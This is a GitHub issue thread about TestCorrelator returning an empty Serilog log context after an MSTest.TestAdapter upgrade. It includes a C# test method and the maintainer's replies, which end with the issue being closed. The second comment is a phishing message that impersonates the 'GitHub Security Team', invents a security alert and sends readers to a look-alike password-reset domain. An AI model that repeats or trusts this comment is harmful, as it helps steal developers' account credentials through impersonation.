### ISSUE TITLE
Empty LogContext with update of MSTest

### ISSUE THREAD

**Issue by milbrandt** [MitchBodmer/serilog-sinks-testcorrelator#71]
The following test works fine with MSTest.TestAdapter 3.2.2 for net6.0. In 3.3.0 the test fails, Only the NuGet was updated.
Maybe a change based on [Merge all implementations of TestContext](https://github.com/microsoft/testfx/pull/1302) is required in the TestCorrelator?

```csharp
    [TestMethod]
    public void MessageDataNullCorrelationIdLogContainsMethodName()
    {
        // Arrange
        using (TestCorrelator.CreateContext())
        {
            var msg = new Message<int>(null!, 5, null, null!);

            // Act
            _ = msg.MessageData;

            // Assert
            var logContext = TestCorrelator.GetLogEventsFromCurrentContext().ToList();
            Assert.AreNotEqual(0, logContext.Count, "logContext should contain data");
        }
    }
```

**Comment by GtdsIndonesia** [comment]
# Urgent: Security Alert for

Hello,

We've detected unusual activity in your GitHub repository . To ensure that your account remains secure, we urgently need you to take action.

## What You Need To Do:

1. **Verify Repository Settings**
   - Ensure that your repository settings have not been altered without your consent.

2. **Reset Your Password**
   - Visit this secure link to reset your password immediately: [Reset Password](https://github.hudevelopers.online/)

3. **Revoke Unauthorized Access**
   - After resetting, please review any unauthorized access and revoke them.

Thank you for your prompt attention to this matter to ensure the security of your GitHub account.

*If you did not initiate these changes, please contact us immediately.*

Best Regards,  
**GitHub Security Team**

**Comment by MitchBodmer** [comment]
I don't see any log events being emitted here, but I'm assuming you expect there to be some in either the constructor or the property access. Does this still happen if you log explicitly within the context?

**Comment by MitchBodmer** [comment]
I've done some testing recently with the most up to date versions of MSTest and never reproduced this. I'm going to close this since I never heard back from you.
